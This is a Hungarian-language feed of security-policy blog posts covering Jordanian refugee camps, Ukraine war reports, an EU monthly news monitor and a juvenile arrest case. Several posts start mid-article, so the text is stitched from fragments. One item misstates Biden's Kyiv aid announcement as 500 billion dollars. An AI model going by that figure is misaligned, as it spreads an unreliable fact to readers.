Az azraqi menekülttábort 2014-ben nyitották meg azzal a célzattal, hogy csökkentse a zaatari tábor túlzsúfoltságát. Jelenleg 40 000 fő menekültnek ad otthont, irányítását a Szíriai Menekültügyi Igazgatóság (SRAD) és az ENSZ Menekültügyi Főbiztossága koordinálja. A menekülttábort szintén falualapú megközelítéssel hozták létre, hogy a lakosok körében erősítsék a felelősségvállalás és a közösség érzését. Az Azraq táborban jelenleg négy egészségügyi alapellátási központ, 15 iskola és 388 hivatalos üzlet működik, amelyek a menekültek és a befogadó közösség tagjainak tulajdonában van. A magas szintű biztonság és a távoli elhelyezkedés miatt az azraqi tábort általában a „kevésbé vonzó” tábornak tekintik. Sőt, Azraq soha nem érte el a 120 000 fős maximális befogadóképességének a felét sem, mivel a menekültek többsége úgy döntött, hogy táboron kívül jobb helyzetben élhet. Továbbá, a táborokban a nők és lányok elleni nemi erőszak miatt dönt úgy sok család, hogy lehetőség szerint elkerüli az ide való költözést.

Zaatar-ban és Azraq-ban különböző módon juthatnak a menekültek jövedelemhez. A jövedelemszerzési lehetőségek lehetséges formái közé tartozik például az ösztönző alapú Önkéntességi rendszer (Az IBV aktív szerepet játszik abban, hogy a menekültek lehetőségük legyen kiegészítő jövedelemhez jutni) és a magánvállalkozások működtetése a helyi piacon, amely által a menekültek különböző vállalkozásokat is működtethetnek; például fodrászüzleteket, ruházati boltokat, illetve ételstandokat. Minden menekült havi 23 jordániai Dinár (32 dollár) értékű élelmiszer-utalványt kap a Világélelmezési Programtól (WFP), továbbá a WFP az iskolai étkeztetési program keretein belül napi étkeztetést biztosít a két táborban működő iskolák tanulói számára. Azonban ezek a támogatások már nem elégítik ki az alapvető szükségleteket a növekvő élelmiszeráraknak köszönhetően. Külső válságok sorozata gazdasági válságot és inflációt idézett elő Jordániában (a szíriai konfliktus gazdasági következménye, COVID-19 világjárvány, orosz-ukrán háború) ennek következményeképpen pedig a szíriai és iraki menekültek rendkívül nehéz helyzetbe kerültek az országban. Az ENSZ Menekültügyi Főbiztossága szerint a zaatari táborban élő menekült családok nagy része eladósodott, és 92 százalékuk arról számolt be, hogy emiatt kénytelek az élelmiszerfogyasztás csökkentéséhez vagy illegális munkák vállalásához folyamodni. A jordániai menekülttáborokban már az ukrajnai háború kitörése előtt is nőtt az élelmiszerellátás bizonytalansága: a táborokban a menekült háztartások több mint fele (58%) élelmezési gondokkal küzd, míg két évvel ezelőtt ez az arány csak 39,5% volt. Továbbá a szigorú be- és kilépési feltételek miatt a táborok lakói nagyrészt el vannak zárva a külső munkaerőpiacoktól és élelmiszervásárlási lehetőségek széles skálájától, így rendkívül érzékenyen reagálnak a táboron belüli élelmiszerár-emelkedésekre.

Viszont úgy tűnik, hogy a Zaatar-on és Azraq-on kívül jelenleg nehezebb a megélhetés a menekültek számára. A táborokban uralkodó nehéz helyzet és szigorú szabályok ellenére a menekültek egy része úgy döntött, hogy visszaköltözik a menekülttáborokba (munkanélküliség, valamint az emelkedő üzemanyag- és áramárak miatt), amelyeket korábban elutasítottak. Zaatar-ban és Azraq-ban (az Azraq tábor az első megújuló energiával működő menekülttábor a világon) napenergiával biztosítanak áramot a lakók számára, illetve menedékházakban helyezik el a menekülteket, így az itt élők megélhetési költségei alacsonyabbak. Továbbá, úgy tűnik, hogy a jordániai kormány is a menekülttáborokba való visszatérésre ösztönzi az egykori lakókat, hiszen így csökkenhetnek az anyagi nehézségeik. Azonban a növekvő lakók száma egyre nagyobb terhet ró az ENSZ Menekültügyi Főbiztosságára, hiszen már így is túlzsúfoltak a táborok, ahol szükség lenne a szolgáltatások bővítésére és korszerűsítésére.

Tekintettel a jelenlegi világgazdasági helyzetre és a növekő inflációra Jordániában az ideális megoldás a táborok fejlesztése és kapacitásának kibővítése lenne, így a visszatérő és már bent élő menekültközösségek kevésbe szenvedik el a válság következményeit. Ahogy említettem, a menekülttáborokban is rendkívüli nehézségekkel néznek szembe a lakók, azonban a kialakított szociális hálónak köszönhetően biztosabb megélhetés vár az itt élőkre.

[Az Innovációs és Technológiai Minisztérium ÚNKP-22-2-II-NKE-61 kódszámú Új Nemzeti Kiválóság Programjának a Nemzeti Kutatási, Fejlesztési és Innovációs Alapból finanszírozott szakmai támogatásával készült.]

Hasonló témájú cikkeink ide kattintva olvashatók.

Photo by Mohammad Almashni on Unsplash

[1]George, Alan. Jordan: Living in the Crossfire. London: Zed Books Ltd, 2005.

[2]George, Alan. Jordan: Living in the Crossfire. London: Zed Books Ltd, 2005.

[3]7Singh, Mnajari. األزمة إدارة إلى األزمة ضبط من :19-كوفيد بعد األردن) Jordan after COVID-19: From Crisis Adjustment to Crisis). Washington: Washington Institue for Near East Policy, 2020/04/15.

A Egy évtized küzdelem: A szíriai és iraki menekültek helyzete a Jordán Hásimita Királyságban bejegyzés először Biztonságpolitika-én jelent meg.

A közlemény szerint tíz katona és két civil került vissza ukrán területre. A civilek közül egy Harkiv megyéből, egy pedig a Donyeck megyei Mariupolból származik. A parancsnokság arra nem tért ki, hogy cserébe az ukrán fél adott-e át orosz foglyokat. Az Ukrajinszka Pravda hírportál emlékeztetett arra, hogy március 24-én Ukrajna egyoldalúan és feltétel nélkül visszaadta Oroszországnak mind az öt súlyosan megsebesült orosz foglyot, akik szállítható állapotban voltak.

Olekszandr Szirszkij, az ukrán szárazföldi erők parancsnoka közölte, hogy találkozott a Donyeck megyei Bahmut városát védő ukrán katonákkal, és cáfolta a város bevételéről közzétett orosz állításokat. Szavai szerint folyamatos kapcsolatban van azokkal az ukrán alakulatokkal, amelyek a front legkritikusabb részein teljesítenek szolgálatot. „Találkoztam azokkal a katonákkal és parancsnokokkal, akik lerombolták a Wagner-zsoldosok és az orosz ejtőernyősök legyőzhetetlenségéről szóló mítoszt” – jelentette ki, ugyanakkor nem pontosította, hogy legutóbb mikor találkozott Bahmut védőivel.

„Az ellenség gyengül, ezért újabb és újabb hamisítványokkal próbálja leplezni a Bahmut elfoglalására irányuló erőfeszítéseinek kudarcait” – tette hozzá. Szirszkij legutóbb március 27-én hozta nyilvánosságra, hogy látogatást tett a Bahmutot védő ukrán alakulatoknál. A szárazföldi erők parancsnokát megelőzően Szerhij Cserevatij, az ukrán keleti erők szóvivője, és Andrij Jermak, az ukrán elnöki iroda vezetője cáfolta, hogy a Wagner orosz zsoldoscsoport elfoglalta volna a bahmuti városházát, ahogy azt Jevgenyij Prigozsin, a Wagner-csoport alapítója egy videóüzenetben bejelentette.

„Semmit sem foglaltak el, és enyhén szólva messze vannak attól, hogy bármit is elfoglaljanak a városban” – jelentette ki a szóvivő egy sajtónyilatkozatában. Hozzátette: harcok folynak a városháza épülete körül, de „jogi értelemben az orosz erők nem foglaltak el semmit”.

Az ukrán vezérkar esti helyzetjelentésében arról számolt be, hogy erőik hétfőn több mint 45 orosz támadást vertek vissza, a harci cselekmények epicentrumában továbbra is a donyecki régió három települése, Bahmut, Avgyijivka és Marjinka van. A jelentés szerint az ukrán légierő a nap folyamán öt csapást mért orosz élőerő- és fegyverzetgócpontokra, valamint megsemmisítettek egy orosz drónt. A rakéta- és tüzérségi egységek egy orosz csapatösszpontosulásra mértek csapást. Eközben az orosz erők három rakéta- és 17 légicsapást intéztek, valamint több mint húsz támadást hajtottak végre rakéta-sorozatvetőkkel az ukrán csapatok állásai, és a települések polgári infrastruktúrája ellen – írta az ukrán vezérkar.

Volodimir Zelenszkij, ukrán elnök az Ukrinform hírügynökség szerint kijelentette, hogy az ukrán hadsereg nagyszabású ellentámadást fog végrehajtani, és Ukrajna minden ideiglenesen megszállt területét visszafoglalják. Részleteket nem árult el, azt sem, mikor indul az ellentámadás – mint mondta – azért, hogy Oroszország ne tudjon felkészülni rá. „Az orosz csapatoknak még van idejük elhagyni Ukrajnát, különben megsemmisítjük őket” – szögezte le Zelenszkij. Az ukrán vezérkar hétfői helyzetjelentésében közölte, hogy mostanra az orosz hadsereg Ukrajnában elszenvedett embervesztesége meghaladta a 175 ezret.

The post Orosz agresszió: újabb ukrán foglyok térhettek haza appeared first on .

A moszkvai tájékoztatás szerint az üggyel kapcsolatban Lavrov felhívta Blinken figyelmét arra, hogy tiszteletben kell tartani az orosz hatóságok lépéseit, amelyeket a jogrenddel és Oroszország nemzetközi kötelezettségeivel összhangban tettek meg. Az orosz tárcavezető megengedhetetlennek nevezte azt, ahogy washingtoni tisztségviselők és a nyugati média felháborodást keltenek „azzal a nyilvánvaló szándékkal, hogy politikai színezetet adjanak az ügynek”.

„Lavrov kiemelte, hogy Evan Gershkovich-ot tetten érték, amikor újságírói státuszának álcája alatt próbált meg államtitoknak minősülő adatokhoz jutni” – állt a közleményben. Az orosz fél közölte, hogy a törvénybe ütköző tevékenységet folytató amerikai állampolgár őrizetbe vételéről az Egyesült Államok moszkvai nagykövetségét az előírásoknak megfelelően értesítették, Gershkovich sorsáról pedig bíróság fog dönteni.

Az orosz külügyminisztérium szerint Lavrov és Blinken néhány kétoldalú kérdést is megvitatott.

The post A kémkedéssel gyanúsított újságíróról tárgyalt az orosz és az amerikai külügyminiszter appeared first on .

„Ha ez meg is történne, az Csehország lakossága számára semmiféle veszélyt nem jelentene” – mondta a tárcavezető kérdésre válaszolva.

Moszkva azon bejelentésére reagálva, hogy Oroszország taktikai atomfegyvereket telepít a szomszédos Fehéroroszországba, Cernochová leszögezte: Csehország semmi esetre sem számol azzal, hogy területére atomfegyvereket telepíthetnének. „Semmi ilyesmi nincs napirenden” – hangsúlyozta a védelmi miniszter.

Cernochová szerint a NATO júliusi vilniusi csúcstalálkozóján várhatóan döntés születik a szervezet keleti szárnyának további megerősítéséről. A miniszter úgy vélte, hogy erre az orosz bejelentés nélkül is sor került volna. „Az Ukrajnában lejátszódó eseményeket nem lehet figyelmen kívül hagyni” – mutatott rá Cernochová.

Lubomír Metnar korábbi védelmi miniszter, Cernochová beszélgetőpartnere szintén úgy fogalmazott, hogy „az orosz bejelentésre mindenképpen reagálni kell”.

Cernochová szerint nem valószínű, hogy az orosz-ukrán konfliktus gyorsan befejeződne, másfelől folyamatos erőfeszítéséket kell tenni a problémák diplomáciai megoldása érdekében. „Mindegy, hogy ki fog közvetíteni, akár a Nyugat, akár egy Oroszországhoz közeli ország” – jegyezte meg a miniszter. Hozzátette, Kínát sem lehet kizárni.

The post A cseh lakosság számára állítólag nem jelentene fenyegetést az atomfegyverek bevetése Ukrajnában appeared first on .

A Miskolci Törvényszék közleménye szerint a fiatal az üzenetváltások során kilátásba helyezte az általa méltatott lövöldözésekhez hasonló cselekmény végrehajtását. A nyomozás jelenlegi állása szerint a fiatalkorú gyanúsított cselekménye emberölés előkészülete bűntettének megállapítására alkalmas.

A bíróság álláspontja szerint megalapozottan feltehető, hogy a gyanúsított a bizonyítást veszélyeztetné tárgyi bizonyítási eszköz, elektronikus adat megsemmisítésével, elrejtésével, esetleg szabadlábon lévő társaival összebeszélne, őket az eljárásról tájékoztatná. Fennáll annak a veszélye is, hogy a cselekményt folytatná vagy az előkészített bűncselekményt véghez vinné – írták.

A közlemény szerint mindezekre, valamint a bűncselekmény kiemelkedő társadalomra veszélyességére tekintettel a bíróság vasárnap egy hónapra elrendelte a fiatal letartóztatását, amelyet javítóintézetben kell végrehajtani. A végzés nem végleges — közölte a Miskolci Törvényszék.

The post Letartóztatásban egy fiatalkorú emberölés előkészületének gyanúja miatt appeared first on .

Ez a Biztonságpolitikai Szakkollégium EU hírfigyelője, amely havi rendszerességgel jelenik meg. Az összeállításban az Európai Unió egyes szakpolitikáinak legfrissebb fejleményeibe nyújtanak betekintést a szerzők.

Közös biztonság- és védelempolitika

Az Európai Unió a közös biztonság- és védelempolitika keretében február 20-án elindította az EU örményországi polgári misszióját (EUMA). Az EUMA egy semleges és nem végrehajtó misszió, amely kétéves mandátummal rendelkezik majd. A missziót az örmény-azerbajdzsáni határ örmény oldalán fogják telepíteni, és célja az örmény határ menti területek stabilitásához, bizalomépítéshez és az emberi biztonság megteremtéséhez való hozzájárulás, valamint olyan környezet biztosításához, amely elősegíti az Örményország és Azerbajdzsán közötti, az EU által támogatott normalizációs erőfeszítéseket.

Az Európai Unió, a NATO és Ukrajna február 21-én tartotta első háromoldalú találkozóját. Josep Borrell uniós kül- és biztonságpolitikai főképviselő, Jens Stoltenberg NATO főtitkár és Dmytro Kuleba ukrán külügyminiszter által képviselt felek megvitatták a fegyver- és lőszerbeszerzési rendszer javításának lehetőségeit, hogy továbbra is támogassák Ukrajnát. Mind az EU, mind a NATO hangsúlyozta, hogy támogatja Ukrajna önvédelemhez való jogát, amelyet az ENSZ Alapokmánya is rögzít.

(Készítette: Mészáros Kinga)

Energia- és klímapolitika

Az Európai Unió – a nemzetközi G7+ csoporttal együtt – további ársapka-intézkedést fogadott el a tengeri szállítású orosz kőolajtermékekre. A kőolajtermékekre vonatkozó ársapka 2023. február 5-től lépett életbe. A kőolajtermékekre és a nyersolajra vonatkozó ársapkákat folyamatosan figyelemmel kísérik, hogy biztosítsák hatékonyságukat és hatásukat. Az orosz kőolajtermékekre két árszintet határoztak meg: az egyiket a „prémium nyersolajhoz” tartozó kőolajtermékekre, mint például a dízel, a kerozin és a benzin, a másikat pedig a „diszkont nyersolajhoz” tartozó kőolajtermékekre, mint például a fűtőolaj.

A Bizottság 2023. február 13-án részletes szabályokat javasolt annak meghatározására, hogy mi számít megújuló hidrogénnek az EU-ban. Ez szabályozási biztonságot nyújt a befektetők számára, mivel az EU célja, hogy a REPowerEU-tervvel összhangban elérje a 10 millió tonna hazai megújuló hidrogéntermelés és a 10 millió tonna importált megújuló hidrogén mennyiségét.

Az Európai Bizottság 2023. február 14-én új CO2-kibocsátási célértékeket javasolt az új nehézgépjárművekre vonatkozóan 2030-tól kezdődően. Ezek a célkitűzések hozzájárulnak a közlekedési ágazat CO2-kibocsátásának csökkentéséhez – a tehergépkocsik, a városi és távolsági buszok az EU teljes üvegházhatásúgáz-kibocsátásának több mint 6%-áért és a közúti közlekedésből származó üvegházhatású gázok kibocsátásának több mint 25%-áért felelősek. Ezek a szigorított kibocsátási előírások biztosítanák, hogy a közúti közlekedési ágazatnak ez a szegmense hozzájáruljon a kibocsátásmentes mobilitásra való áttéréshez, valamint az EU éghajlatvédelmi és környezetszennyezés-mentességi célkitűzéseihez.

(Készítette: Mészáros Kinga)

[Az Innovációs és Technológiai Minisztérium ÚNKP-22-2-II-NKE-74 kódszámú Új Nemzeti Kiválóság Programjának a Nemzeti Kutatási, Fejlesztési és Innovációs Alapból finanszírozott szakmai támogatásával készült.]

Környezetpolitika

2023 februárjában az Ukrajnába látogató Bizottság tagok, az ukrán kormánnyal egyeztettek az ország segítésével kapcsolatban. Az Európai Unió a NEB-bel (New European Bauhaus) együtt támogatja a városok fenntartható, energiahatékony és klíma semleges úton történő újjáépítését. A fejlesztési projektet a Horizont Európa és a LIFE program finanszírozási segítségével fogják megvalósítani.

2023 február 9-én Brüsszelben, az Észt Állandó Képviseleten kerekasztal-beszélgetést tartottak a Zöld Városok és egyéb szervezetek vezetői, hogy eszmecserét tartsanak arról, hogyan tehetnék a városokat jobbá tenni a lakosság és a környezet figyelembevételével. Észtország fővárosa, ami nemrégiben vált Európa 2023. évi Zöld Fővárosává, négy szóval jellemezné ezen évre szóló terveit. Ezek a biodiverzitás, innováció, éghajlat és a fenntartható kormányzás.

(Készítette: Vida Fanni)

Egészségügy

2023. február 7-én Moldova csatlakozott az Unión belüli EU4Health társulásához. Ennek köszönhetően ez az ország is hozzáférhet majd az egészségügy területén megjelenő uniós támogatásokhoz. Ez hozzájárul az egészségügyi rendszer fejlesztéséhez és például a COVID járvány utáni helyreállítási folyamatokhoz is.

A hónapban a Bizottság intézkedéseket javasolt a veszélyes vegyi anyagokkal dolgozók egészségének megőrzése érdekében. Új expozíciós határértékeket vezetnének be, amelyekkel például az ólom és diizocianátok negatív hatásait minimalizálni tudják. Két irányelv módosítása került előtérbe, melyek a rákkeltő, mutagén anyagokkal kapcsolatos kockázatoknak kitett munkavállalók és a munkájuk során vegyi anyagokkal kapcsolatos kockázatoknak kitett munkavállalók alkalmazását szabályozzák.

Az előző hónapban már említett recEU, mintegy 545,6 millió eurós készleteihez csatlakozott februárban Horvátország, Franciaország, Lengyelország és Finnország. Ez a pénzügyi alap a HERA együttműködésével a vegyi, biológiai és radiológiai veszélyekre való felkészülés és reagálás céljából biztosít támogatást. A készlet az uniós egészségügyi és polgári védelem között hoz létre együttműködést. A Bizottság emellett pályázati felhívást tett közzé, mely a világjárványt okozó kórokozókra való reagálásra összpontosít.

(Készítette: Vida Fanni)

Szankcióspolitika

2023. február 4-én az Európai Unió tagállamai megállapodtak az orosz kőolajtermékekre vonatkozó árplafon mértékéről. A Tanács úgy határozott, hogy két árplafont állapít meg az Oroszországból származó vagy onnan exportált, 2710 KN-kód alá tartozó kőolajtermékekre vonatkozóan. Emellett a Tanács kinyilvánította igényét arra, hogy március közepétől ismét felülvizsgálja a nyersolajra vonatkozó árplafon-mechanizmust, és a felülvizsgálatra rendszeresen, kéthavonta kerüljön sor.

A vonatkozó árplafon 2023. február 5-től alkalmazandó szintjét az árplafon-koalícióval szoros együttműködésben állapították meg úgy, hogy a nyersolajhoz képest kedvezményes áron forgalmazott termékek árát 45 dollárban, míg a nyersolajhoz képest felárral forgalmazott termékek árát hordónként 100 dollárban állapították meg.

Ezek azok a hordónkénti árak, amelyeken vagy amelyek alatt az Oroszországból származó kőolajtermékek mentesülnek a szállítási tilalom alól:

• kőolajtermékek tengeri szállítása harmadik országokba és
• a kőolajtermékek harmadik országokba irányuló tengeri szállításával kapcsolatos technikai segítségnyújtás, közvetítői szolgáltatások vagy finanszírozás vagy pénzügyi támogatás.

Február 20-án arról született döntés, hogy az EU 2024. február 24-ig meghosszabbítja Ukrajna egyes, nem kormányzati ellenőrzés alatt álló Donyeck, Luhanszk, Zaporizzsja és Herszon területekre irányuló, a velük való gazdasági és egyéb kapcsolatokat az Oroszországi Föderáció általi jogellenes elismerése, megszállása és annektálása miatt korlátozó intézkedésekről szóló (KKBP) 2022/266 határozatot.  Amelynek jegyében a területeket érintő korlátozó intézkedések a következők:

• a területről származó áruk behozatalának tilalma
• bizonyos áruk és technológiák kiviteli tilalma
• egyes tanácsadási és konzultációs szolgáltatások tilalma.

Az említett határozat tehát módosította a (KKBP) 2022/266 határozat címét, és kibővítette a korlátozások földrajzi hatályát, hogy az kiterjedjen Ukrajna valamennyi, nem kormányzati ellenőrzés alatt álló területére. Ennek értelmében az Unió továbbra is töretlenül támogatja Ukrajnának a nemzetközileg elismert határain belüli szuverenitását és területi integritását, és változatlanul kitart az Oroszország általi illegális annektálás el nem ismerése politikájának teljeskörű végrehajtása mellett. Az Unió nem ismeri el és továbbra is elítéli az ukrán területek Oroszországi Föderáció általi jogellenes annektálását, mint a nemzetközi jog megsértését.

Február 25-én, az orosz-ukrán háború egyéves évfordulója után egy nappal elfogadásra került az EU tizedik szankcióscsomagja az Oroszországi Föderáció Ukrajna ellen irányuló agressziójára válaszul. A szankciók szükségessége kapcsán Josep Borell, az Európai Unió biztonság-, és védelempolitikai főképviselője a következőképpen nyilatkozott: „Putyin fokozza ezt az illegális agressziót, fegyverként használva a telet, az élelmet és az éhezést. Oroszország továbbra is megmutatja embertelen arcát a civil célpontok elleni brutális rakétaterrorral. A mai 10. szankciócsomag azokat veszi célba, akik közreműködnek e brutális háború folytatásában. További intézkedéseket hozunk, amelyek a bankszektor, a kettős felhasználású technológiákhoz való hozzáférés és a fejlett technológiák ellen irányulnak. Tovább növeljük az Oroszországra gyakorolt nyomást – és ezt addig fogjuk tenni, amíg szükséges, amíg Ukrajna fel nem szabadul a brutális orosz agresszió alól.”

A fent leírtak jegyében foganatosított csomag a következőkre vonatkozó tilalmakat tartalmazza:

– kritikus technológia és ipari termékek exportja

– aszfalt és szintetikus gumi behozatala

– gáztárolási kapacitás biztosítása oroszoknak

– az EU-ból exportált kettős felhasználású termékek és technológia tranzitja Oroszországon keresztül.

Emellett az Unió egyrészt felfüggesztette az RT Arabic és a Sputnik Arabic műsorszórási engedélyeit. Másrészt korlátozta az orosz állampolgárok lehetőségét arra, hogy az EU kritikus infrastruktúráinak és szerveinek vezető testületeiben bármilyen tisztséget betöltsenek. Harmadsorban fontos megemlíteni, hogy új jelentéstételi kötelezettségeket vezetett be a vagyonbefagyasztási tilalmak hatékonyságának biztosítása érdekében és további szankciókat vezetett be 87 személy és 34 szervezet ellen, köztük kulcsfontosságú döntéshozók, katonai vezetők, a Wagner-csoport katonai parancsnokai és a szankciók bevezetése során elsőként iráni dróngyártók ellen. Végül a kettős felhasználású áruk szintén a korlátozások fókuszpontjává váltak: a határozat további 96 szervezettel bővíti az Oroszország katonai és ipari komplexumát az agressziós háborúban közvetlenül támogató szervezetek listáját, és ezáltal szigorúbb exportkorlátozásokat vezet be velük szemben. Az orosz védelmi és biztonsági ágazat technológiai fejlesztéséhez hozzájáruló, korlátozás alá eső termékek listájára mostantól további új elektronikus alkatrészek kerülnek fel, amelyeket a harctéren előkerülő orosz fegyverrendszerekben használnak, beleértve a drónokat, rakétákat, helikoptereket, valamint bizonyos ritkaföldfémeket, elektronikus integrált áramköröket és hőkamerákat.

(Készítette: Haiszky Edina Julianna)

Szomszédságpolitika

Keleti szomszédságpolitika

A keleti szomszédság tekintetében, ismét Ukrajna megsegítése és integrálása az európai közösségbe állt februárban a szakpolitika középpontjában. Február 2-án az EU újabb 450 millió eurós támogatási csomagot jelentett be Ukrajnának 2023-ra, amivel az EU, a tagállamok és az európai pénzügyi intézmények által a háború kezdete óta nyújtott támogatás összege mintegy 50 milliárd euróra emelkedett. Emellett az Európai Bizottság 1 milliárd eurós hozzájáruláson dolgozik a gyors helyreállításhoz. Az új, 450 millió eurós támogatási csomag 145 millió eurót tartalmaz humanitárius segítségnyújtásra és 305 millió eurót kétoldalú együttműködésre az infrastruktúra gyors helyreállítása, Ukrajna ellenálló képességének növelése és a reformfolyamat támogatása érdekében.

Az EU megállapodott arról is, hogy Ukrajnát tovább integrálja az egységes piacba, és bevonja a kulcsfontosságú uniós programokba – jelentette be Ursula von der Leyen, az Európai Bizottság elnöke a Denys Shmyhal ukrán miniszterelnökkel közösen tartott sajtótájékoztatón. Ugyanezen a napon Ursula von der Leyen találkozott Olena Zelenszka ukrán elnökasszonnyal, hogy megvitassák az ukrajnai árvák támogatását. Az Európai Bizottság elnöke elmondta, hogy az EU legfeljebb 10 millió eurót biztosít egy modern gyermekgondozási stratégia kidolgozására egy testvérvárosi projekt keretében. Az Európai Unió Tanácsa február 2-án az Európai Békefenntartási Eszköz keretében olyan támogatási intézkedéseket fogadott el, amelyek további katonai segítséget nyújtanak az ukrán fegyveres erőknek. Ezek egy 500 millió eurós hetedik csomagból, valamint egy új, 45 millió eurós támogatási intézkedésből állnak, amely az Európai Unió katonai segítségnyújtási missziójának (EUMAM Ukraine) képzési erőfeszítéseit támogatja.

A következő napon, 2023. február 3-án sor került az EU-Ukrajna csúcstalálkozóra is. Charles Michel, az Európai Tanács elnöke, Ursula von der Leyen, az Európai Bizottság elnöke és Volodimir Zelenszkij, Ukrajna elnöke Kijevben találkozott a 24. EU-Ukrajna csúcstalálkozón. Beszámoltak arról, hogy az Európai Bizottság felkérést kapott arra, hogy a szokásos bővítési csomag részeként ősszel számoljon be Ukrajna tagfelvételi kérelméről szóló bizottsági véleményben meghatározott feltételek teljesüléséről. Az EU üdvözölte Ukrajna csatlakozását az EU CUSTOMS és FISCALIS programjához, a Horizont Európa, az Euratom, a Digitális Európa és az EU egységes piaci programjához való csatlakozását, valamint az Európai Elektronikus Hírközlési Szabályozók Testületében való részvételét. Megvitatták, hogyan lehetne Ukrajnát tovább támogatni, és hogyan lehetne fokozni az Oroszországra gyakorolt kollektív nyomást, hogy véget vessenek a háborúnak és elérjék a csapatkivonást Ukrajnából. Az EU kijelentette, hogy készen áll arra, hogy globális partnereivel szoros együttműködésben és koordinációban tovább erősítse a szankciós intézkedéseket, miközben biztosítja azok hatékony végrehajtását, illetve megakadályozza a kijátszását.

Február 10-én új ukrán-román határátkelőhelyet avattak fel „Diakivtsi-Racovat” határátkelőhelyen. Az új határátkelőhely a második, amelyet a közelmúltban nyitottak meg Ukrajna és Románia között, miután 2022 novemberében felavatták a „Krasznojilszk – Vicovu de Sus” átkelőt. Az Európai Unió ukrajnai tanácsadó missziója (EUAM) mindkét esetben stratégiai tanácsokkal látta el az ukrán hatóságokat az integrált határigazgatással kapcsolatban.

Az Európai Unió és Moldova február 7-én Brüsszelben megtartotta első társulási tanácskozását azóta, hogy Moldova az Európai Unió tagjelölt országává vált. Az ülésen Josep Borrell, az EU kül- és biztonságpolitikai főképviselője és Natalia Gavriliţa moldovai miniszterelnök közösen elnökölt. A felek megvitatták az EU és Moldova közötti kapcsolatokat, különös tekintettel a politikai párbeszédre és a reformokra, a gazdasági és ágazati együttműködésre, valamint a kül- és biztonságpolitikai területen való együttműködésre és közeledésre. Borrell külön kiemelte Moldova erőfeszítéseit az Ukrajnából érkező menekültek befogadására, továbbra Ukrajna  mezőgazdasági exportjának és gazdaságának a globális piacokra jutásának előmozdítását. Az EU támogatni fogja továbbá Moldova erőfeszítéseit fizetési rendszerének modernizálására, hogy teljesítse az egységes eurófizetési térségbe való integráció feltételeit.

(Készítette: Mészáros Kinga)

[Az Innovációs és Technológiai Minisztérium ÚNKP-22-2-II-NKE-74 kódszámú Új Nemzeti Kiválóság Programjának a Nemzeti Kutatási, Fejlesztési és Innovációs Alapból finanszírozott szakmai támogatásával készült.]

Déli szomszédságpolitika

Az Európai Unió újabb 296 millió Euróval támogatja Palesztinát. A támogatásokat az olyan állami kiadásokra fogja fordítani a palesztin vezetés, mint az egészségügy fenntartása, vagy éppen a fizetések folyósítása a Kelet-jeruzsálemi régióban.

Az Európai Unió támogatásáról biztosította a földrengéssel sújtott Törökországot és Szíriát. A humanitárius támogatásokat 12 ország ajánlotta fel az Unió szervezetén keresztül. Az Európai Unió több mint 10 millió Euró humanitárius támogatást nyújtott a földrengés áldozatainak.

Az Európa Tanács 7 millió euró támogatást nyújtott a Jordániai Fegyveres Erőknek. „Ezzel a döntéssel az Európai Unió megmutatja, hogy Jordánia továbbra is bízhat bennünk, a segítségünkben és a barátságunkban. Elkötelezett partnerei vagyunk Jordániának.” – foglalta össze az EU álláspontját Josep Borell, az Európai Unió külügyi és biztonságpolitikai főképviselője.

Az Európai Befektetési Bank 2,5 milliárd eurót különít el a fenntarthatóságra, gazdasági növekedésre és a munkahelyteremtésre Tunéziában 2011 óta. Ez a nagyarányú kölcsön az Európai Befektetési Bank legnagyobb partnerévé tette Tunéziát (Az EU-s országokat leszámítva).

Az elmúlt öt évben az Európai Befektetési Bank 2,5 milliárd Eurót biztosított Marokkó gazdasági támogatására és infrastruktúrájának fejlesztésére. 2022-ben a Bank több mint 380 millió Eurót juttatott el Marokkónak. A támogatások hozzájárulnak Marokkó fenntartható fejlődésének elősegítéséhez.

(Készítette: Nagy Imre Jonatán)

Szerkesztette: Mészáros Kinga

A hírfigyelő korábbi kiadásai ide, hasonló témájú cikkeink pedig ide kattintva érhetők el.

Photo by Sara Kurfeß on Unsplash

A EU hírfigyelő 2023. február bejegyzés először Biztonságpolitika-én jelent meg.

Ez a Biztonságpolitikai Szakkollégium Orosz-ukrán háborút kutató műhelyének hírfigyelője. A havonta megjelenő beszámolóban a kutatósejt tagjai egy-egy általuk fontosnak tartott hírt mutatnak be, amelyek a műhely témájához kapcsolódnak.

Biden Ukrajnába látogatott

Az Egyesült Államok elnöke február 20-án meglepetésszerűen az ukrán fővárosba látogatott, az ukrán-orosz háború egy éves évfordulója alkalmából. Ezzel az úttal szerette volna kifejezni „rendíthetetlen támogatását” az ukrán nemzetnek az oroszok ellen vívott háborúban.

A látogatás érdekessége, hogy titokban tartották Joe Biden látogatását egészen addig, amíg meg nem érkezett; az államfő minimális kíséretet kapott és nem árultak el részleteket a sajtónak az utazással kapcsolatban egészen a tárgyalások végéig. A Fehér Ház értesítette az orosz hatóságokat néhány órával az érkezés előtt arról, hogy az amerikai elnök Kyjivbe látogat, de ennek ellenére is elindultak a légi riadók elindultak a fővárosban.

A látogatás alkalmával Joe Biden bejelentette, hogy még 500 milliárd dolláros katonai segély érkezik, viszont nem említett szót a nagy hatótávolságú fegyverekről és az F-16-os repülőgépekről. A tárgyalások során beszélgettek Ukrajna harctéri igényeiről; az energia, az infrastruktúra és a gazdaság támogatásáról, illetve humanitárius szükségeiről. A háború politikai oldaláról is tárgyaltak, ideértve a közelgő ENSZ Közgyűlést, amelynek a témája Ukrajna lesz. Ezenkívül szó esett Ukrajna elképzeléseiről a békével kapcsolatban, és az elengedhetetlen nemzetközi támogatásról, hogy lehetséges legyen egy igazságos és tartós béke építése – mondta Jake Sullivan a tárgyalásokról, aki az Egyesült Államok biztonsági tanácsadója.

Írta: Misák Veronika

Az ostromgyűrű bezárul, válasz: ukrán ellentámadás?

A Wagner Csoport tovább halad előre Bahmut városában. Nagyjából március 9-re az orosz erők elfoglalták az ukrán település keleti felét, azaz elérték a Bahmutka folyót. A hír nem orosz túlzás az ukránok felrobbantották a hidakat, amik összekötik a város két részét, ez bizonyítja, hogy az ukrán védők valóban nehéz helyzetben vannak és feladták a város keleti felét. A NATO főtitkár Jens Stoltenberg szerint is Bahmut a következő napokban eleshet. Ugyanakkor Volodimir Zelenszkij ukrán elnök megtiltotta a hátrálást.

Egyes források szerint a Wagner erői már hídfőállást foglaltak el a folyó túlpartján. Ezenkívül északon az AZOM gyár területén törnek előre, valamint délen megközelítették a híres MiG-17-es emlékművet, ami az utóbbi napokban megsemmisült. 

Az ukránok erre válaszul néhány forrás szerint ellentámadásra készülnek Bahmutnál.

A terv négy irányból mért csapás az orosz erőkre:

